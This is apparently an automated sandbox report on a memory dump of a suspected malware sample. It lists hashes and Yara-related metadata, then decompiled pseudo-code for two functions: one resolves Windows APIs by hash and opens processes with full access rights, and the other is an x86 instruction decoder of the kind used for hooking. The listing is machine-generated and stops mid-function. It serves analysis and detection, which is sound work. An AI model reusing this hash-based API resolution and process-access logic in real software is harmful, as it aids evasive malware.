Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f865e4e932c31dfd2691de44c162cc2a97c659fbf57c6a55d4bd8b029f807ca0
Instruction ID: db52313a8e6357d8aeece158c5f9c2ec41e705eea557ced663923b270acbdf59
Opcode Fuzzy Hash: f865e4e932c31dfd2691de44c162cc2a97c659fbf57c6a55d4bd8b029f807ca0
Instruction Fuzzy Hash: 3A126471508341DFD7A5DFA4C840AAEB7A9EFC5708F208919E899972A4FB30DD02CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6ECF846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6ECFB69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6ECFF4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6ECFF678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6ED0223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6ECFF678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6ECFF5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6ECFF5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6ECFF4E0(_t449 + 0x14, 0);
									_t180 = E6ED02928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6ECFB608(_t449 + 0x34);
										E6ECFB608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6ECFF4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E6ECFF4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6ECFB608(_t449 + 0x34);
										E6ECFB608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6ECFCAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6ECFC2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E6ECFF84C(_t449 + 0x14, E6ECFF4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6ECFF4E0(_t449 + 0x14, E6ECFF4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6ED0303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6ECFF84C(_t449 + 0x40, E6ECFF4F0(_t449 + 0x3c) + 4);
											 *(E6ECFF4E0(_t449 + 0x40, E6ECFF4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6ECFCD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6ECFF4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E6ECFF4E0(_t449 + 0x40, _t431 * 4);
												E6ECF8B9C( *_t211, E6ED002D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6ECFCD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6ECFF4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6ECFF4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6ECFF4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6ECFF4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6ECFF4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6ED038C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6ECFF4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6ECFF84C( *(_t449 + 4), E6ECFF4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6ECFF4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6ECFF4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6ECFF4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6ECFF4E0(_t322, _t430);
										E6ED038C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6ECFF4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6ECFF84C(_t322, E6ECFF4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6ECFF84C( *(_t449 + 4), E6ECFF4F0( *_t449) + 4);
								 *(E6ECFF4E0( *(_t449 + 4), E6ECFF4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6ECFF84C(_t322, E6ECFF4F0(_t322) + 4);
								 *(E6ECFF4E0(_t322, E6ECFF4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6ECFF4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6ED0303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6ECFF4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6ECFF84C( *(_t449 + 4), E6ECFF4F0( *_t449) + 4);
										 *(E6ECFF4E0( *(_t449 + 4), E6ECFF4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6ECFF4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6ECFF84C( *((intOrPtr*)(_t449 + 0x74)), E6ECFF4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6ECFF4E0( *((intOrPtr*)(_t449 + 0x74)), E6ECFF4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6ECFF4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6ECFF4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6ECFF4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6ECFF4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6ECFF4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6ECFF4E0(_t430, _t443);
										E6ED038C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6ECFF4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6ECFF84C(_t430, E6ECFF4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6ED0303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6ECFF4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6ECFF4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6ECFF4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6ECFF4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6ECFF4E0( *(_t449 + 4), _t445);
										E6ED038C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6ECFF4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6ECFF84C( *(_t449 + 4), E6ECFF4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6ECFF4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6ecf8479
0x6ecf847f
0x6ecf8483
0x6ecf8487
0x6ecf8492
0x6ecf8496
0x6ecf849b
0x6ecf84a3
0x6ecf84b3
0x00000000
0x6ecf84b5
0x6ecf84bd
0x6ecf84c4
0x6ecf84c4
0x6ecf8a17
0x6ecf8a19
0x6ecf8a5a
0x6ecf8a5c
0x6ecf8a6b
0x6ecf8a77
0x6ecf8a77
0x6ecf8a66
0x6ecf8a7d
0x6ecf8a82
0x00000000
0x6ecf8a82
0x6ecf8a6a
0x00000000
0x6ecf84ce
0x6ecf84d2
0x6ecf84d5
0x6ecf85dd
0x6ecf85dd
0x6ecf85e2
0x6ecf8705
0x6ecf8709
0x6ecf870e
0x6ecf8712
0x6ecf8716
0x6ecf884c
0x6ecf884e
0x6ecf8852
0x6ecf885b
0x6ecf8866
0x6ecf886a
0x6ecf8873
0x6ecf8878
0x6ecf887e
0x6ecf887f
0x6ecf8883
0x6ecf8887
0x6ecf888e
0x6ecf8890
0x6ecf89d0
0x6ecf89e1
0x6ecf89e8
0x6ecf89ef
0x6ecf89ef
0x6ecf89f2
0x6ecf89f5
0x6ecf89f8
0x6ecf89fe
0x6ecf8a05
0x6ecf8a09
0x6ecf8a12
0x00000000
0x6ecf8a12
0x6ecf8a00
0x6ecf8a03
0x6ecf8a1c
0x6ecf8a34
0x6ecf8a37
0x6ecf8a3c
0x6ecf8a46
0x6ecf8a49
0x6ecf8a4c
0x6ecf8a55
0x00000000
0x6ecf8a55
0x00000000
0x6ecf8a03
0x6ecf8898
0x6ecf8898
0x6ecf889a
0x6ecf889e
0x6ecf88a3
0x6ecf88a5
0x6ecf88a9
0x6ecf88ac
0x6ecf88b4
0x6ecf88b6
0x00000000
0x00000000
0x6ecf88cd
0x6ecf88e8
0x6ecf88ea
0x6ecf88f8
0x6ecf88fd
0x6ecf88ff
0x6ecf891c
0x6ecf891c
0x6ecf8920
0x6ecf8922
0x00000000
0x00000000
0x6ecf8924
0x6ecf8927
0x6ecf8948
0x6ecf8967
0x6ecf896d
0x6ecf8970
0x6ecf8975
0x6ecf8976
0x6ecf897d
0x00000000
0x00000000
0x6ecf8985
0x6ecf8985
0x6ecf8987
0x6ecf8993
0x6ecf899f
0x6ecf89c1
0x6ecf89c6
0x6ecf89c7
0x6ecf89c7
0x00000000
0x6ecf8987
0x00000000
0x6ecf8927
0x6ecf8901
0x6ecf8907
0x6ecf8909
0x6ecf890a
0x6ecf890b
0x6ecf890c
0x6ecf8910
0x6ecf8914
0x6ecf8916
0x6ecf8917
0x6ecf8918
0x6ecf891a
0x00000000
0x00000000
0x00000000
0x6ecf891a
0x6ecf892d
0x00000000
0x6ecf892d
0x6ecf871c
0x6ecf871e
0x6ecf8720
0x00000000
0x00000000
0x6ecf872a
0x6ecf872a
0x6ecf872c
0x6ecf872f
0x6ecf8731
0x6ecf8739
0x6ecf8740
0x6ecf8744
0x6ecf8747
0x00000000
0x00000000
0x6ecf8843
0x6ecf8844
0x6ecf8846
0x00000000
0x00000000
0x00000000
0x6ecf8846
0x6ecf874d
0x6ecf8750
0x6ecf8759
0x6ecf875e
0x6ecf8760
0x6ecf876c
0x6ecf8770
0x6ecf8775
0x6ecf8779
0x6ecf8b56
0x6ecf8b6a
0x6ecf8b8c
0x6ecf8b91
0x6ecf8b91
0x6ecf878f
0x6ecf8794
0x6ecf8798
0x6ecf8798
0x6ecf8798
0x6ecf8798
0x6ecf879d
0x6ecf87a2
0x6ecf87a4
0x6ecf87a8
0x6ecf87af
0x6ecf87b4
0x6ecf87b6
0x6ecf8b17
0x6ecf8b26
0x6ecf8b3f
0x6ecf8b44
0x6ecf8b44
0x6ecf87c9
0x6ecf87ce
0x6ecf87d2
0x6ecf87d2
0x6ecf87d2
0x6ecf87e4
0x6ecf8805
0x6ecf880d
0x6ecf881b
0x6ecf8839
0x6ecf883f
0x6ecf883f
0x00000000
0x6ecf8750
0x6ecf85e8
0x6ecf85e8
0x6ecf85ea
0x6ecf85f1
0x6ecf85ff
0x6ecf8601
0x6ecf8605
0x6ecf8607
0x6ecf8609
0x6ecf8644
0x6ecf8653
0x6ecf8655
0x6ecf8657
0x6ecf8675
0x6ecf8677
0x6ecf8679
0x6ecf868b
0x6ecf86a9
0x6ecf86b2
0x6ecf86b5
0x6ecf86c3
0x6ecf86d4
0x6ecf86f2
0x6ecf86f4
0x6ecf86f8
0x6ecf86f8
0x6ecf86f8
0x6ecf8679
0x00000000
0x6ecf8657
0x6ecf860f
0x6ecf860f
0x6ecf8614
0x6ecf861b
0x6ecf862a
0x6ecf8631
0x6ecf8633
0x00000000
0x00000000
0x6ecf863f
0x6ecf8640
0x6ecf8642
0x00000000
0x00000000
0x00000000
0x6ecf8642
0x6ecf8635
0x6ecf8638
0x00000000
0x00000000
0x6ecf86fa
0x6ecf86fa
0x6ecf86fb
0x6ecf86fb
0x00000000
0x6ecf84db
0x6ecf84db
0x6ecf84db
0x6ecf84dd
0x6ecf84e4
0x6ecf84f2
0x6ecf84f4
0x6ecf84f8
0x6ecf84fa
0x6ecf8526
0x6ecf852a
0x6ecf852f
0x6ecf8534
0x6ecf8538
0x6ecf853c
0x6ecf8543
0x6ecf8548
0x6ecf854a
0x6ecf8ad9
0x6ecf8ae8
0x6ecf8b07
0x6ecf8b0c
0x6ecf8b0c
0x6ecf855d
0x6ecf8562
0x6ecf8566
0x6ecf8566
0x6ecf8566
0x6ecf8577
0x6ecf8579
0x6ecf857b
0x6ecf858c
0x6ecf858c
0x6ecf8591
0x6ecf8596
0x6ecf859a
0x6ecf859f
0x6ecf85a6
0x6ecf85ab
0x6ecf85ad
0x6ecf8a9b
0x6ecf8aa7
0x6ecf8ac1
0x6ecf8ac6
0x6ecf8ac6
0x6ecf85c3
0x6ecf85c8
0x6ecf85cc
0x6ecf85cc
0x6ecf85cc
0x6ecf85cc
0x6ecf85cf
0x6ecf85cf
0x00000000
0x6ecf85cf
0x6ecf84fe
0x6ecf84fe
0x6ecf8500
0x6ecf850c
0x6ecf8513
0x6ecf8515
0x00000000
0x00000000
0x6ecf8521
0x6ecf8522
0x6ecf8524
0x00000000
0x00000000
0x00000000
0x6ecf8524
0x6ecf8517
0x6ecf851a
0x00000000
0x00000000
0x6ecf85d0
0x6ecf85d4
0x6ecf85d5
0x6ecf85d5
0x00000000
0x6ecf84dd
0x6ecf84d5

Strings

, xrefs: 6ECF8A5E

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction ID: 09337e53bdd722ceb9042ac6d8dc6d37c619104bd817b05106e9aa3fb8c0219f
Opcode Fuzzy Hash: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction Fuzzy Hash: 1B125271208344DFD7A4DFA5C990A9E77E9EF85708F20492DE999872A0FB309D06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ED09348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6ED09348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6ED03670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
